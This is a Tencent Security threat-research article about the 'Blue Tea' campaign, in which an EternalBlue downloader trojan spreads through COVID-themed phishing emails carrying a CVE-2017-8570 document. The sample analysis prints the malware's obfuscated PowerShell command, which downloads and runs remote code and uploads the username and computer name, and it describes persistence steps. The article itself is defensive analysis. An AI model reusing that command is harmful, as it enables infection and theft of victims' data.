产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御验证码
T-Sec 天御文本内容安全
T-Sec 天御视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→
解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
HOT
最新动态
威胁研究
合作伙伴
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
考试入口
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云

威胁研究

正文

永恒之蓝木马下载器展开“蓝茶”行动，已变身“邮件蠕虫”

2020-04-10 12:46:16

腾讯安全威胁情报中心检测到“永恒之蓝”下载器木马新增邮件蠕虫传播能力，伪造新冠疫情为诱饵的钓鱼邮件传播，此次被命名为“蓝茶行动”的病毒攻击行为已致多家知名企业被感染，并在04月09日出现新的攻击高峰，建议各企业IT部门采取针对性防御措施。

一、背景

腾讯安全威胁情报中心检测到“永恒之蓝”下载器木马新增邮件蠕虫传播能力，于04月03日对样本进行了分析（参考链接：https://mp.weixin.qq.com/s/YdoACRlHdQDYS6hjSgx1PA）。威胁情报中心对该木马的活动情况进行持续追踪，发现此次被命名为“蓝茶行动”的病毒攻击行为并未停止，截止目前已有大量知名企业被感染，并在04月09日出现新的攻击高峰，建议各企业IT部门采取针对性防御措施。

二、样本分析

病毒执行后自动查找当前用户的邮箱通讯录并发送以新冠肺炎为主题(“The Truth of COVID-19”)的邮件，邮件附件文档名为urgent.doc，该文档附带CVE-2017-8570漏洞（Office高危漏洞，又称沙虫二代）攻击代码，如果被攻击用户收到邮件并不慎打开文档，就可能触发漏洞执行Powershell命令执行恶意代码。

文档触发漏洞最终下载执行的恶意代码是http[:]//t.awcna.com/mail.jsp，命令同时还会搜集用户名%username%、计算机名%computername%上传至服务器。

powershell IE`x(Ne`w-Obj`ect Net.WebC`lient)."DownLoadString"('http[:]//t.awcna.com/mail.jsp?*%username%*%computername%')

mail.jsp会修改hosts文件，将随机产生的DGA域名指向病毒使用的服务器地址，然后安装一个随机名计划任务，执行命令为“PS_CMD”；安装一个名为bluetea的计划任务，执行命令为：“bluetea”，但是目前这两个命令均无法执行有效的代码，而此次行动因为使用的特殊名字“bluetea”被命名为“蓝茶行动”。

“蓝茶行动”在安装完 “bluetea”计划任务后，会将“永恒之蓝”下载器历史版本安装的计划任务“Rtsa”、“Rtsa1”、“Rtsa2”删除，并将该病毒此前从t.awcna.com下载的usb.jsp、ipco.jsp、eb.jsp、 ipc.jsp攻击脚本已经全部更换为与mail.jsp相同的代码，可以推测病毒正在进行更新换代，为后续的攻击做准备。

三、趋势分析

由于“蓝茶行动”具备邮件蠕虫传播属性，可对中招用户的通讯录联系人发起二次攻击，导致病毒可能造成同一企业内、合作伙伴之间、供应商之间发生感染扩散，例如4月9日某汽车电子公司遭受同一企业同事的邮件蠕虫攻击。

腾讯安全威胁情报中心大数据分析显示，Bluetea攻击行动从2020.03.30开始，之后攻击趋势略有下降，但是在04.09日攻击量再次迅速增长，推测在该病毒增加邮件蠕虫传播能力之后，传播扩散的风险较大。

Bluetea（蓝茶）攻击影响波及制造业、科技、酒店、物流、金融等10多个行业，其中制造业、科技企业、酒店行业受害最严重。

已经出现病毒感染名单的包括众多知名企业：某财产保险公司、地产集团公司、电子科技公司、科研机构、高校、汽车公司、食品生产公司等等。由于Bluetea攻击时发送的钓鱼邮件以当前社会关注度极高的新冠肺炎为主题，导致用户打开诱饵文档的可能性较高，一旦中招又会造成企业内形成二次传播。

腾讯安全威胁情报中心建议企业IT部门将公司接收到邮件主题为“The Truth of COVID-19”，附件名为urgent.doc的邮件加入恶意邮件列表进行拦截，防止企业员工因防范疏忽打开恶意附件而中毒。永恒之蓝下载器系列木马在感染电脑的主要危害是进行门罗币挖矿，会消耗大量主机资源，同时，该系列木马具备窃取机密和远程控制的能力。

四、安全建议

1.建议用户不要轻易打开不明来源的邮件附件，对于邮件附件中的文件要格外谨慎运行，如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描；

2.服务器使用安全的密码策略，特别是IPC$、MSSQL、RDP账号密码，切勿使用弱口令，避免遭遇弱密码爆破攻击；

3.根据微软安全公告及时修复Office漏洞CVE-2017-8570，推荐使用腾讯御点或腾讯电脑管家进行漏洞扫描和修复（https://s.tencent.com/product/yd/index.html），或采用Windows Update进行；

4.推荐企业用户部署腾讯T-Sec高级威胁检测系统（腾讯御界）对黑客攻击行为进行检测。腾讯T-Sec高级威胁检测系统，是基于腾讯安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统，该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接：https://cloud.tencent.com/product/nta